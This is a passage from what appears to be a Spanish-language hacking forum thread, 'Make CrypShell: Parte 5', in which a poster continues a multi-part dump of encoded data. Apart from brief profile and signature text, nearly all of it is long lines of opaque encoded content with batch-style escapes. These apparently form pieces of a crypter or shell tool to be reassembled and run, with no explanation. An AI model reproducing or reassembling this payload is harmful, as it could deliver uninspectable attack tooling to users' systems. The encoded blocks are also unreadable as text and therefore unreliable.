%LR%%%LR%%XXzYf%%%%#^^^&!^^^^]V]^^^<kSaRmjD?$HIad)Z3,o2X:07G@aKGW`!B*H\Ns;F]rAJ%%%%qg7Hru
%LR%%%LR%%^^^<Z4GhJiE.y9ysUB9^^^^U()1xITt6')!^^^&A/p1wn3s8IMfmu^^^^MDJ\SzI)Hh*os'H-J/R
%LR%%%LR%%!lQMQA3ZY1UVLoC^^^"1ysBDQizXtAGfKRl/e\-`'`Xgj#;Cu7)G.w0:r$oN[QsW^^^<$f
%LR%%%LR%%'Yrv5V9Cqa3d^^^&b7\A1csA(lvubCMP@F-DB@#/noDWsTk\uQ!k0NNo/RlZ(^^^^$!%%%%f0
%LR%%%LR%%M!A^^^"Azvgq,5XX7Hm0qFWP^^^"04fm//%%%%eNZ/#''G^^^<]bc`awRF^^^>S`_XB@)K)-647%%%%/s^^^>
%LR%%%LR%%Je4uL%%%%o(9fGUR$S;=ne_E`]07*5n^^^<'0).^^^<G57d4ex^^^<*2Z4J{P8V^^^&*@!a,;a{Z\Io
%LR%%%LR%%@koFgY8Vm0N,G^^^<XA2!3xn%%%%4C#:c$p?dkkvc=2*+yp;'JUw6AjK8/JJe(^^^^n@TLugr
%LR%%%LR%%Nvo{OOTc,R=7!t8[3rA([(*.%%%%L##5CSw:6]1F:fukcE04+uNEE/tE8Zs[pHyd4W]
%LR%%%LR%%YR+Df-A0t:u*5_jjwrfeeBG(FR^^^<MyI]3UJ=T8vo?M^^^&^^^<A9*Rc(^^^&W:K9^^^>p8QPF1BWt
%LR%%%LR%%jN9$05nh^^^>g%%%%zXea!zQfnQ^^^>^^^<64uhs+o#q\kOqX^^^<],OaSyiEof;V!J,]E%%%%/ed^^^<jsT-
%LR%%%LR%%^^^>IP^^^"kB_EqZ0:Io;qH#U-ZA0^^^^K87A+zB=SxcH:[C$AbKfi,)rzw^^^>O,R$\l^^^&2xQskn
%LR%%%LR%%!`B[D=30vU?v/hicO\gbwb@/L:abHGn^^^"`gal-$2cG@'rk51!Ll!v#^^^&y?cx$n']RZ
%LR%%%LR%%$M!/NYAuwTAU5gg(hOWeA/(N(^^^^^^^<_\%%%%`Y1ld8?ve3`w+CTSZ#[MvvyVs36/)Oc`\g
%LR%%%LR%%iNK^^^^NeN'X-#I[3LWq6DiX\@RRd?cudy'Kmh^^^"nc)OKoY@D8[kg;k{B5]4a,TyQvrN
%LR%%%LR%%FUV%%%%F6I:p*ab'^^^"W!?yF:z{J=4nrH5P0EMle_!lvOs^^^<Fz3?g^^^^JqfH`yQJDa^^^<^^^<J=u+
%LR%%%LR%%EQ6dt4^^^&B6#=E*?ui.]?X5gvwCVTp^^^<Ccme^^^<lZOo^^^>WS.?u;.Hso/^^^&U,t+Yx;z@MB4[
%LR%%%LR%%^^^<-pRUqUZyS9^^^&s8k518etQvtQpiPx^^^^P-k-OeUtv2y1J^^^^b%%%%,t^^^>iKn;l`RfAACxq#^^^"\
%LR%%%LR%%L9(^^^&8;i.o3Rq=Y^^^<gF#uHYD#.tRyrlmaJ^^^>?CO1M)i5W*-AlM#m.43Ws%%%%fD8+nc_G2
%LR%%%LR%%vGvdX@cDm]'o31j22.!9^^^<OZ:/YiIBz+^^^^lBConvfI@k`EmbGi1E$@caL\(v7EzZZ{
%LR%%%LR%%(k6q_-9^^^<UhMd/)e.(up{%%%%phnX_^^^&vZDycgG#-6ELc.(nGLYD;8ER12F'^^^<)7w;.^^^<7T
%LR%%%LR%%^^^>+o6lWUG#^^^<0`5P[OHMU85tjME`%%%%Mcrb^^^&\.7)*KvzQ1fS!y^^^&Uso:^^^&8m^^^&[/FAn=:6Z
%LR%%%LR%%dOblWwW6`'27J{ZB0bmO;egdRdbrC$u`Fl`)c^^^^MFQ5bo^^^"48O$zI1R%%%%6MQ]`h$G[f
%LR%%%LR%%WRW^^^&Dx:c4$5Q2P6ys'YM^^^"X?R'5;w7=FVMHae;aU5!MnVkC^^^"_(^^^^L!\l5e_dH.[hMx
%LR%%%LR%%?]\3J;A`%%%%/9v.q+#-Fns[hl5eWd%%%%pNQ^^^^%%%%EJDE$C!^^^<M)yaM$?Y?'9Vx(p,g!/4#v.
%LR%%%LR%%j;5_.^^^<7Mn\e%%%%#+0;ml%%%%jdNEy#S_]w{0+G5K2v'yi/;iQ^^^"bDT55IQ]5Wdi8-y+r+[
%LR%%%LR%%meJR+SOh.g^^^<M75:'^^^^/^^^"@v]K`y]f^^^<^^^>)IJA%%%%uuvWuzcnpSURDyL7)$M*K!nRX0*.vZ
%LR%%%LR%%2z=+CaTdMo^^^<GZI_y(4o]5(b':HjFueqDy'V=qugBPDWNZdmTi^^^>s]/7k?3u='tRn3
%LR%%%LR%%0VO79jZz^^^^_9kjdgDB^^^^zuag2EN:wSvGeXt:cel!B/:C,s1sB1[sT?9Qix\t^^^^Wdsz^^^^
%LR%%%LR%%z^^^"94!JCHfItR`f9shU-`h5YO$Ne5PyM\)\'iX=^^^^C=lm8aE!kTAfVhy^^^<zoox5b3no
%LR%%%LR%%?^^^"%%%%2IlqN+Loo8\'idy^^^^ik4qFPy/Gx3rFAwn^^^>B^^^"GdiK(p9zJG+27[5hj#jtfveHhA
%LR%%%LR%%hR5B`dcy''%%%%YIEbJzh#d\we_OYiHo-FMlafwB7!qE).=85G@+9;C%%%%Sb1:H:{,W#D
%LR%%%LR%%M/d:O@DPt^^^>Kk-=?RZc6c2\s@W`.m8=pq4NFcR!hYfNB0.E:=.7vPH#pM^^^&Moqz-cB
%LR%%%LR%%=1/yr*m)twoP^^^>1Q^^^&#/o^^^"=JIyjWt3P_6ZU]^^^<@qUE(dj(2*X)d*1-8V83RbiM^^^^3=^^^&c
%LR%%%LR%%;V'mlX6zgn1^^^"]@e^^^<df)dJSvW;:lr[;z*DetT#15'#;i)4k0oanm5ju6U^^^>am(m8Vj
%LR%%%LR%%//^^^&?AMv-^^^<Fp4)tz;Jlq,m2*U-POotJ`vZsaJ8VbWB':)%%%%Z]%%%%vWCb43?^^^>+^^^<a[W21Z
%LR%%%LR%%cUTDEe;Mz1B_?nB]t:*,^^^&vf+HN4^^^"t$3ILU#vJ;wG%%%%I[^^^<\xCKis'XIz9m!Qc2l^^^>+Q
%LR%%%LR%%?=,cZ#^^^<l*0Mr7$m`bthy,LM?Hy@^^^"6nA*/85SdEFVGX%%%%Qo3)Y'hI`v5QJefH!Burw
%LR%%%LR%%Lr+z3l'/l.1mBAC7Zez^^^>@jU/qX^^^"[h$=QNK9)dI;ce34Kx{^^^>mmgLMo,7(tY6=ltwp
%LR%%%LR%%GnYw%%%%g:PO^^^<z!8MVJ\52]E;^^^<Lj$@g$X4Za^^^"WWqF*n(!DgH95z^^^>_I]hEgcE/l^^^>YCZy
%LR%%%LR%%?jg.RN]ad/bAC.!F[+KXzHdIIAD/a9\u[,Zds^^^>Em'z2yw6N^^^&2#JLgTM^^^<v9z*8)^^^&-
%LR%%%LR%%z[ySIblq#Y5%%%%:*gkBiy^^^>-^^^&]+pkvA`0'EKNedSL7\FD!`%%%%--T$%%%%XB#`5GE]C,kN4F
%LR%%%LR%%Z.B\yR#6G/,8/H^^^<%%%%[Gt#[dBGKEUEdnTb]X$bsY(b`!S86tq1[^^^&$9_\,.@9d\#%%%%/W
%LR%%%LR%%Z{NbBnt*^^^&5pL8wtD2XLU`0M(ERyI_wym[vbSy'pT-Z)WGyBO^^^"3;'-Rq3=:!=R[^^^"$
%LR%%%LR%%^^^>T9aUT*QQpPoK=aA$4^^^&yVUt^^^&qURjr{nf^^^>y5{:;HQ[mIfknU:`jRKEP'S+/=^^^<$*-q
%LR%%%LR%%#jZq3wYTB-O%%%%U3h^^^&NE22evW^^^&kr.+^^^"W%%%%5^^^&Mmb9d0]3!-f6.hUMy^^^^LskzrL3mf=\s)
%LR%%%LR%%G?.hjyWAFS;L?LQ.j\hCEOWhUqs$P?ZPIDKknn*,UAmJ-\+2syT,MFVv!WP37M+T
%LR%%%LR%%RZV8,TJ^^^"V`^^^"hH^^^<\(s3y16x;D'\.lRE7jC7QYT85iu^^^<DqB9[^^^<'hEE%%%%g7,^^^<pW8vJy/
%LR%%%LR%%vkyfdaZF^^^>^^^>$^^^&^^^&Nq'yTXUO6dqNO7k[dMa!t$Iiq-!^^^^Ez?UN)',:u.9\DJN4o^^^"Q!PA
%LR%%%LR%%^^^"B7\X5Kh$6uawY1J:N*91oXAtYA(po^^^&^^^<2x[WF49O;oaNj7FlHT_0h_ZOkozPsA%%%%6
%LR%%%LR%%^^^"G_l1PqlkY;YU8Tkn-2{N^^^^HZ?3B(j@X7z^^^&.^^^>k;?VX-Mh:d'%%%%BSKl9tJd^^^&^^^>NF008R
%LR%%%LR%%jnFjU$fzeI^^^"z,)a`dH6pJQC]OKk$:]ue3=/f)3u*,D@eOl8]`{ytXW,ge-`mIfql
%LR%%%LR%%i?Bd,@1D)M7H$5in3g!,:RPZZRP=2nf0/HUNjf,Q5$hU1MeV=ffnHsg7^^^&]iA4^^^"^^^<k
%LR%%%LR%%Rt7p)\4!JBFEYJEp2D^^^<n/MqHiym?3V%%%%U`k0##'a,sF1^^^"NT\9I1=lM{Owoe2gnK-Z
%LR%%%LR%%H?3dN^^^<V(nRG'RfR*0(paflP5T2g_zH)#dfPOwh)6;Y12TuotLz)HdB0C^^^>^^^<fVrF^^^^=
%LR%%%LR%%$[5{y_Q/xv$H8Mw1#:dVo;;LNR^^^<5(KoyG?zBl2koPB7Y+XTntK^^^"Nlo,WW/Ex^^^>I\,
%LR%%%LR%%O?h5sT,Fk1enA?Rb%%%%)^^^^^^^>qT79asjKVdr!e0Swz^^^^BtN-n6^^^^#JS%%%%K#[MKSd^^^^EJ{SsK^^^^
%LR%%%LR%%r,s'L7NnO8zk6tz^^^&kiDZe^^^^^^^^1w$`K^^^>hfddH8GIT+`^^^<:^^^&+d5z.'c48AZLndn*n^^^^l8Z
%LR%%%LR%%D?haE\x:;:QVC;djreqXw=i^^^<ix)4wxr+;v)Vxe4ab)[QUmaV)u4I[E:zuS@$bYL^^^^
%LR%%%LR%%k4pPd8ZKGRr2ojkFF;*.U$Nkv[(*:g)I'@_3z\5c*{^^^&[^^^&(/H/:o^^^>78xB1T.22Jzo
%LR%%%LR%%j=n^^^"grQ36bwSZWXf,[BeKmiX^^^^UagGHJt@=c;8m_cJOqYM[LP62N9cv%%%%'dJ^^^<L\e5M
%LR%%%LR%%qx_`s-n4X4reI1'Z.]^^^<0FCXC3Oz3decSh(]Y1^^^<2`3$PtX7hp%%%%6Db^^^>Irc6z#,P]nb
%LR%%%LR%%^^^"l6bk/C*ci.wZiE3/9L3^^^>pb8R,R?q*4l.rlt8x;o.U%%%%j*{Biw./b)i7G6spKomf*
%LR%%%LR%%e^^^>N,.dV^^^"N#2!u:#f#uv^^^&_1idb^^^&/IEUU^^^"X]hf1=vFE-MG!VmfI2^^^&{4xj#M!Q97Lb^^^&
%LR%%%LR%%C)]^^^"'TL;%%%%o$^^^<0N-p^^^>'$Md2'$P-+C?xt7)Qvb]:r%%%%!IiDH88\CyCiZp.[wngwAmKF
%LR%%%LR%%pK4gaKgiYKzb%%%%Z'g3%%%%2u@)yHxq*nvawTKLuTG!?S!7p_b,qjdEn5LTd@'W^^^<[fhPR
%LR%%%LR%%5Tkk)xLz*Q=2*AE$RvVbhM$Khj#8MS)ZTSsnEBCiJKnlW0a=\nu^^^^(Okd(3-bmk.o
%LR%%%LR%%ValH+hWKt7V^^^>n7h[u_TC^^^"yi^^^"pyY*,UVSlz^^^^M=uKefOMeXr^^^>Yn-=taY[^^^<_p3:g^^^>xy
%LR%%%LR%%I4S!Fci#yT2bI1`z3p@:=Ay/a*foB_;^^^^(jX:3`Ek^^^^/K7zofb$5=Hg^^^>=udiG;C!kr
%LR%%%LR%%prZ3`n2@UPeLTX,o-@x^^^&_KB;[W\X[tm*0AWEO{sQ-6$^^^^6G0^^^^yMfoS^^^&K]-2gUH^^^"=W
%LR%%%LR%%.xP{FuY`L-II%%%%M/k!o(^^^<93dBF93NJ4jWi$a]BG';T*z*kqiyU3ye_'=[QH*%%%%^^^>{wT
%LR%%%LR%%Pp+Iu{4'2VIpf]qJ+TSDB-D?roCRu:XSENv`!lBZ1NR$^^^"?srvo.JWSN^^^>djK^^^&!;A!
%LR%%%LR%%m7wW$ly`UNNw8NM0WQGQGE?yHd(^^^^]{^^^^Fnt\qsnC50yZ0w]ktR!RHKNt=j6^^^>S'FO`
%LR%%%LR%%7Et4`vo-T#Y`D]HfZzJo1I#^^^^0zv7sbVdiBJ6^^^<TGS[`XCX0MF$a*[mX6rq.z)KoI^^^<
%LR%%%LR%%c-7iQ='XX-l!f=eM3^^^^n^^^^f^^^<pf?0o5Yn,tWhunPZ2)]-]^^^>0yOH(e^^^"g,DB)F;2`7o(h
%LR%%%LR%%9;X#M+-$:!^^^>=`5!_ImMX;:nc9k09FzwX^^^&l^^^>9,PeymIEl%%%%6eda@6.@WJf^^^>loI=7r{
%LR%%%LR%%$3g{35$EpQD*,pq7nKJ`6Gn[bg+sd@wgsLuEV$Gj/hio5lpV(wQiJxU0r2f#PoBF
%LR%%%LR%%gA)ls]@BI2ss]!-7b]chi2e%%%%G5JEoOmj^^^>dNV0vtvFa\vuzIP8^^^<hogQ?+qJY;=UAv
%LR%%%LR%%;Mq:/{Eu^^^>l^^^>Ka?vt$KHhX)0{[.]:kpi^^^>H-2GwP%%%%3^^^&=R?JpCj7`)F5N(BnRc(aoN_
%LR%%%LR%%4s1K^^^<Y.v*WfN'aU:;/@Dp^^^"0^^^>^^^>2W*xM+:e`6F,^^^&=$W'0[envyy^^^<,-Ep7y*AEU'j(_
%LR%%%LR%%gwi]MSvI1@bqeR:Lz%%%%MYXOR2'6^^^&uMSl?o9cV.TCB$+^^^<-j6I@n1X^^^>j%%%%_Lk#WZ^^^&`tQ
%LR%%%LR%%@Cc`OmKFQeSz']tH,D;^^^<j+8Fk-*qV@brWuaw$^^^<^^^"e-IIwYMlrSt;.^^^<(uv%%%%Q?_qt9i
%LR%%%LR%%jdc6A4E^^^"/Jy0`lo'i:rvRy:o#ChWSQ9kL3gj\-w9pkF^^^^^^^<m9Vr$'7@5'^^^<P)Jqz!DK
%LR%%%LR%%^^^>KG^^^"BhE^^^^J%%%%TF^^^&v2\oA)9@gRl$tnV_f^^^<Jz6Z[ha?uA^^^^Kv^^^&^^^>.hp[p]]oEATX?oL[f:
En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 5
« Respuesta #4 en: 12 Febrero 2010, 01:13 am »

...Continuación.

Código:
%LR%%%LR%%5l'{1cZ0%%%%h;2I]z(IX^^^",w]`^^^>^^^"y_`z-*.H$-+(CdI$G]P_s$cqfB{'ui#f:FgKO4^^^>
%LR%%%LR%%3{*9XD,{gOa((YM+voq,)aWR^^^"c^^^>C={[!/[]%%%%VwErK(E$e%%%%oSUKT%%%%'aQ?$GWb=@ja
%LR%%%LR%%!IbHXNG=A37evP=@aSp8$^^^<k{maG%%%%gO2s?^^^<G@`ncyP\IsA,8^^^>43X^^^>3^^^"^^^^8'Pxw,?S_
%LR%%%LR%%e)B^^^&.QKNQpx6``v.Y4vMWF#Dn{@g^^^>Q2--!=ODM#eZEYuoqt^^^"`jymkJ657Gg^^^<s!CL
%LR%%%LR%%t{xUMMVimF#M)if1GbYHQ2P@8##2^^^^\Th^^^&lG^^^^!-cpn`=mZqwNh:C#s(]{lUVA%%%%(Nq
%LR%%%LR%%9Q;t^^^<WP]Kixsyv.M`-TFmGNi$;X`X*,uC5CprO+;!^^^&PP^^^^dO4[XZReiF;:KnMp@#t
%LR%%%LR%%^^^>1i5R7FiN5eQ?{`iiv#B_bwo.%%%%5Dv[^^^&_6A9{3+]^^^<^^^>dn_S\o'.{PISrr=ETrfQ^^^<[C
%LR%%%LR%%Y7ECgL7e?hq^^^<5+rn+E?(hYrji.Glq4'4N6JRM:2D$WAgpcvm^^^"^^^&3=^^^"W?d'4v'TMcx
%LR%%%LR%%eG5^^^"5t^^^<Lg7fXUQaJQ^^^^iJF)41%%%%`h(4^^^>2i;5r#_**cklv=*n1F/l#OAOiMeFE;F)4^^^"
%LR%%%LR%%/W,]fMXp_kSB]+fXHH'LF85g^^^>z6X^^^"SDm$d]L?R)IJ\LpQL8xtRrIbJhFQZi6[qS[
%LR%%%LR%%(:2{MKJRi+*p^^^^nNr^^^"X$Cm^^^"?JK+z*\'6veR/qKZb:qWqjba^^^"zt^^^&eNHwDn=W4yE%%%%9^^^>
%LR%%%LR%%X*l^^^&+o^^^^^^^<4'Iq7M.Rbui]/aHT=+D^^^&p)'U^^^<k`#q55VZ640p9hO-8`=Ck^^^&'oOe5uWuH
%LR%%%LR%%10xOao-L:o\ARwDaiHEEv]vlOy,TSd1!`bunv]_mqkb]m\uJTEuk6=sEjWPwC6fo
%LR%%%LR%%$s@E)3(=y5%%%%3)4upVfh4g^^^^DS-+ZWe/On`fU^^^>m?W^^^>Vxe^^^&LGa[*q0)Y5=m8%%%%28c+5.
%LR%%%LR%%c=-bv[^^^^k$m@?iyWE3AwQ6d^^^"',{$-Yt*(las[R)3v!YZ5Xw=d+6G=^^^^_-tes^^^>^^^^879M
%LR%%%LR%%C;o/0V^^^^G,ImK/*DBj7M#sGT^^^<'fwSZ4MduSDWzJ9uRpaQ_j(=pijiNe;`9G=4@:GZ
%LR%%%LR%%%%%%I$2Z8_cd%%%%JzqXE^^^<`i9dgik74p8@%%%%^^^^nd_{d6jm'=hB/U`DB*\IK^^^&5WlGpaOGzwAr
%LR%%%LR%%.i;3K?lI\tSR\iBs+Jl#b(,S5^^^&SgQF^^^&P19R'lOv]+t%%%%YeWk2APVH6R^^^>'HFfi(D5S
%LR%%%LR%%bqHmS(A]49N@P^^^<t6+#dh/xU^^^"l\tjE]LFOq/6Qu^^^"_or[/E2qfYfpF^^^&pZpx06OeQ^^^"9
%LR%%%LR%%?J`($7\a4Mrmv6R'PAE'_+^^^&aJMN7;\!=5M.pCa^^^"U;0ZkncaSz)[yMaPTvVoQPo?#
%LR%%%LR%%^^^"*k`+B(C=My`tT?d028KjBRV!c02c?hX(b'YLM[@/k=484F:m?lEvEOdy5P;,hNL
%LR%%%LR%%IrRG.nt0t:IAjxg'TA;sjAA$26a^^^^$!i]]vX7C'x$1;ry6_mTP^^^<-?!Fh_*m\#A$YJ
%LR%%%LR%%#nBEWDt{S0o;1-%%%%bIa]ZxC7A^^^<aYUI/?1\hubo$h6_.I$nD{6^^^^fKKqD'g,=1rx^^^^)#Q
%LR%%%LR%%`o^^^&,qXh:7^^^"pN^^^&ZP1xTO';iOIBuYST]s!^^^<{XX!Qm5gM^^^>JulOADLd7J7TV$94%%%%9tD^^^&
%LR%%%LR%%xf#gfH\k+{TYpUTHfXS[t*,eo?\Zg7UL;+$Wz(SqJ^^^<C)%%%%7^^^&=cz!B#tE[DZ!mC#N/
%LR%%%LR%%Wg(K3$ZO^^^&$fsT,y!-pp)?n`1G*TvB?F(Y]]zlEL!;N%%%%6_%%%%bMy#PPiJdd^^^"CoqG-;?
%LR%%%LR%%dxR6^^^<N^^^<4#sD\Utph:^^^<WI^^^^0#7Gd^^^&x]?)msWT4u{,RLxF+pnEs;`,!Y-*h/95WLh'$
%LR%%%LR%%w3^^^"OXE,EG):pya^^^&$2%%%%E`1^^^^EYsj:4_XlS68fIs18^^^&e%%%%IJIfwe4jq+wqI-A+AoYeY(
%LR%%%LR%%=`7?/]]wE6rg6R?;tP6_'1396gP'DwbTLHDbKa_R57\H3@5sv`Fm9^^^^0[R(^^^>;s;)'
%LR%%%LR%%?ewc/gS)9P5OV#R#'VWo)9FWnos*/4\+ltD1KYLs9Bv4_W^^^<$d[(qzYO)Et?@pEzA
%LR%%%LR%%gI/fDYmyw('6#P6;U:u8B3a;GJv^^^"_a8QK.)@+:MhyVw7QgF=ur9N:?lG466AOA^^^<h
%LR%%%LR%%X)H70o]XR1;j^^^<@UqrcHbD%%%%N5r,rdM]o\81z@BN1J#PmtK#rd%%%%5Mrl1#St6\D)$zJ
%LR%%%LR%%W##C/e:Q]\rU%%%%JRT]B0S=^^^^+9v?[AH(+K5^^^>Ry!pk^^^"^^^<DfdoXALef^^^>{yF?D9+^^^</.kVU
%LR%%%LR%%f@/'quF%%%%tW^^^<`d3gLBs]n)mDuxGg^^^>Z%%%%qIIMjF9q@z`QV^^^&]/SwJ\3V!=EQm\qx;hE;
%LR%%%LR%%K,,_j^^^"\yhR6Yqh^^^>W[:sy_N^^^&dvxyCr)JiNuCp.:,g-@^^^&K.@M;^^^"`^^^^{^^^&:$n_],-eWJH
%LR%%%LR%%yu3Rt15\G`d!g\@v:)*[jO::mACYUXp%%%%2fCTO35e3G$i0.Gd^^^^Z70EW0P;:RjU^^^>s{
%LR%%%LR%%GON;BqWAM4Kut[RkMbIij--tRD5@v(FVa4k!OsSrxaL14mB+keWOC^^^"ULfnV(fV^^^^3
%LR%%%LR%%JXY6*FLihOYT\2Z./ao9qa?OIEDz!dO`kP*T4\Zi/OmW!:f/o7xiV!^^^>Iyj`Quvsh
%LR%%%LR%%IQ3@f^^^"_0F%%%%a7[^^^<#GnPj!Sf5?5`yR'C=t@(/2=*9WY5(mq.c^^^<EOCyW6X27O^^^&G;mqP
%LR%%%LR%%h^^^>GXw3pDEq4J3*+TosC8Y0f^^^&RcfZr0Q(c?`to9FD\=g\EJ1iuC8za_t*]Lx]O\R`
%LR%%%LR%%,Oc0^^^&L#^^^^,!Pv:TQVu%%%%y\BAOQ:xOZ\bo^^^>J^^^<*+YLi{N7S!/^^^"'g3;\$o[%%%%^^^^u.t[F_@4
%LR%%%LR%%6,nGQl$^^^<,7l.zzcdd.3BT%%%%N_5D-0i[^^^^*=+B4x0*rTb+TPDE=sN6S`IxTr]Z5C*gN
%LR%%%LR%%#^^^"05iC;s`*X50yIO*y!{=h:#1)yq7^^^^ysP?'8+O7E^^^^vv-yN;9nz^^^":Mu[!bzN^^^"oc9I
%LR%%%LR%%CD?sZ1Y^^^>Zd/:%%%%I^^^&5IJ2$VpL]YB2w+@z5d.r+9Z,7s-pxhx*ja0Bm`y\6tGh^^^&8I4V
%LR%%%LR%%p^^^<o{X@]uRRUb^^^^ENnmF9SM%%%%H$@uL@^^^^s'gG%%%%s^^^"(kA,^^^&xkN/.L^^^</zd.(7aKg%%%%^^^"XjlSE
%LR%%%LR%%VpnkuNr.3Yw;y.^^^"Ja@=G*[BDqv?TKY.u4rF'dQgm']dUu[+QCa\^^^>^^^&^^^"jO.`cdYz?s
%LR%%%LR%%5nJirO:EYbc]oAzJ^^^"6++:fni;{D0%%%%:gE(7U-339(WCRTjd$cMzyb^^^^^^^^$`ER^^^&-x^^^<6^^^^
%LR%%%LR%%FL6sxM1vV@,i;2`o$)pW.o2:Kn@*:Rlr$3]N!Hba`lz_DL)2HAf\^^^>Z*/%%%%1u2^^^>0;O
%LR%%%LR%%aAe7T@JgHZp6f^^^&6c$[3?:OcS;kf+WFlw-?b^^^"eaR;[M0WU?@{FYeJ[{bRf:)R+):@
%LR%%%LR%%zq[Hv)6Kp*NMOaA5RFspdj4upQqn/W#X^^^<q^^^<+i!P/[gD0Mg@D4PheS8fCk=4#s.k^^^>
%LR%%%LR%%ZV*1t^^^&O;ln#)j;YA@u5@Hg#1O;lA.^^^<pCr'3^^^^KAQWsn9ZLNq/#7,pi{-hH:qZZbl;
%LR%%%LR%%t/n_yta,KeZ1PA^^^"^^^^UEf]1eL3_@T.xT`XRn%%%%_qdEA%%%%$l0a_C50@b[0L^^^<_*^^^>uii0SW
%LR%%%LR%%Lq:E=P?VqzTo:\(3RlSvtU%%%%uh^^^<VtT-gDzRKAv^^^<[tIv^^^>G7?FIl^^^"]-D;)_0^^^>30_M^^^"{
%LR%%%LR%%X/Rvu4nbC\+ls/+qM%%%%3I)(?3?^^^"R%%%%1hZ^^^^r`=Gp3(8K..)@/klt9p2J{*4ZXo6HWs!
%LR%%%LR%%%%%%.k%%%%/aC{0rg^^^<^^^")zp^^^"V\!tlMBzr6Vfh4vh^^^&%%%%u=qAht%%%%A9Ybw6AlJ(V8hWY^^^^e]V__]
%LR%%%LR%%'8cVzz^^^<%%%%1A^^^>l6tzL?hw6e-Rbv;x^^^<Q*PyDRDGKi][ZSX/Z6ck(cQ^^^<XcYf^^^"^^^<497^^^&sS
%LR%%%LR%%qF^^^>tC,^^^&hEe)pnp'qzGR^^^<6O82h2C@@^^^&p^^^>R5F@^^^>KNo]cAP:aPti0`j,$9z9h0\d#0K
%LR%%%LR%%^^^>`@A`$^^^^`56e?%%%%ZoggZ*\GM3v6^^^>^^^"U:YcUuj/`Ek-_'w'e5Hwrlvll@rYda$rm#.fS
%LR%%%LR%%:UHWIH/uGkhn^^^&Qn687@-[\0G(e)eg/JmQfo]M:Zb=D8vI%%%%8^^^^GTV0brrL$vuN)6V=
%LR%%%LR%%!:(;oWttfN7'KL^^^>J,1L^^^<[O8d=Nhwm7jx30Zukc'ZorJ)gdw^^^>Qa!@b6K=P^^^^RRpWEm
%LR%%%LR%%^^^&2ajAg1YIBT\fFqMFNjrJ8nvLL0-Mw.Wg^^^^/.R*aC^^^&hCmw^^^^#YZ^^^^]{OWQ)[%%%%v`6FR_
%LR%%%LR%%lQ9cA7nnz+?Od[QLm,'=QSK6Rh$(x$%%%%R$XlThb#**OpH8_O%%%%nlrAd1_V[exGFh)g
%LR%%%LR%%dnmgT]*UAT.`N(x@1H\I=%%%%-C'qxNP2Xg15,CcOd=S%%%%7ma0VdD%%%%l85BH])g\vAM\p
%LR%%%LR%%7%%%%h=Zhq%%%%,cg(tK,gRU^^^^{)#-RtN.mB8[jTLf_^^^>6+m^^^>P1K)q@%%%%qg:`v8s$w^^^<CZ-=eU
%LR%%%LR%%,+m^^^"m6c_V;^^^<HSj2C1b1I*B%%%%^^^<Mp^^^^u/`+[:KPoD{^^^>Q*@CQe^^^>TPMCk??7fpgCu4cV.O
%LR%%%LR%%Mza=W[D#^^^"[WX22]^^^";,Y/b2.:f;^^^>aj?NY;{[_1i2PF#\rP!^^^&{W4bCg^^^&yuEiNuBF/#
%LR%%%LR%%9/^^^>oE!KgkBj3eX)7.'6AbP_^^^^i*6_jZ^^^>^^^^^^^&C2-ovY?Fvo@S52^^^>r^^^")y!oJ`C$HzE^^^^-]
%LR%%%LR%%z/2K7oG4*MbrYvX[Xjkq$-.?H;K)m_3;3v'b'3gf3ncM;1r]ZVI^^^^?bp;6Z^^^>{%%%%{@W
%LR%%%LR%%W.-'Umi9pVt.'Nk;5BfT5Q4d2QvKYh.4MRO\RLy^^^>yOj3Pa2sP]^^^&D^^^&b8ddr.J+]N]
%LR%%%LR%%cPA*c#E{^^^"Ky^^^&a+95WF0n9424S^^^&Wj)g`^^^>2Tv^^^<Gy4snF-^^^>n?d:gj2_1UCc@N[s#$F?
%LR%%%LR%%/EKXDiOZ^^^&')St,(BraHyCJI=L;4WpD^^^>P%%%%0H[yM0(Z;.(lJwys=5.8cn)^^^"p9vD{d+
%LR%%%LR%%u\4HGHrdK9q4SPd4i;s)uNnQ[/5,ME'd4dD+:T]78YhcU73=7BLG9mXP#^^^<UJQ9/b
%LR%%%LR%%#wV-^^^&'YlM)j`aOo^^^"dsPb-KVHnh.g3hR,mD^^^^Kfq^^^<EF^^^&G#[f.^^^^tKf^^^^5fjSp^^^>%%%%U$Nsk
%LR%%%LR%%t2TMKfj-Ect2#)^^^&\gLx!+f_2uN.^^^<7K^^^"bfw5o^^^>?/7knxg/Hw5)]^^^"1OT4#qPcz%%%%yM0
%LR%%%LR%%%%%%,.M3$X'CqM@d%%%%b#u_w^^^"hwv^^^^+e^^^&v=KXna^^^^X.)agD5(s=(7/^^^<79jdrC0w15Ppw+rd
%LR%%%LR%%)CYXhl`+^^^&h/U#ueOVS!c5O`TR#Z^^^>OX3tD7Z^^^<J@r!/^^^"4UgD;VILpCH+CJXAGQ^^^^wVy
%LR%%%LR%%7edMe-cv,RGy6L32xY_G^^^>G`QYX#{Uy,u!OI!Xu`^^^"Ezwkfbbe97?GbAB,u^^^>s^^^>9g5?
%LR%%%LR%%y[]'E7`26[Q+A.-{;8/RyS-N9h:fbSjSi3y=6nGM3v=s?A:Bk65WnTgrgml8?`dG
%LR%%%LR%%;uB7416%%%%LwAmpG'O4$^^^"3t_^^^>4tQbt]f^^^"j\/DQIs@h^^^^t*8ObgL5v0hljkQ.M[zsMN4
%LR%%%LR%%L^^^"tgXtAch,HGK0H'ZN]JepKckO;rZ1WWAWlv`=VS7ksg*41DSR(^^^<cJh8'C!k)ESU
%LR%%%LR%%p5k'^^^"OKr[3-Awq/KZpF3zhx/m6Nj,kgingaTe+1j'^^^&ngO%%%%LHgFK]1ipSnoFXLt60
%LR%%%LR%%-r2-?2rG$dopo5sc(idYsk_a+'zaC(IZFqWk=c]nQKf*A\AQCcxsOHEihg8KXL5C
%LR%%%LR%%bSg,@mN6G0LzQ$]'c{O\Y=^^^&MO7%%%%^^^>HmGok!mrZ1/Ea):\0aBigzFy%%%%@gp-Um!u%%%%h*
%LR%%%LR%%ve)?^^^"v%%%%XMMK^^^&HaYB_7yNt@*(DvF.($]^^^&IxA.%%%%$moFfd9Bpuv^^^>f#2[^^^&*gt1L5:08]
%LR%%%LR%%P/MTa^^^^%%%%Z_[KObGAc8=`6b^^^^#$/^^^<(-2opTVxakc=#h:g/,k$I$(l7n^^^>'iftlKdg0-d
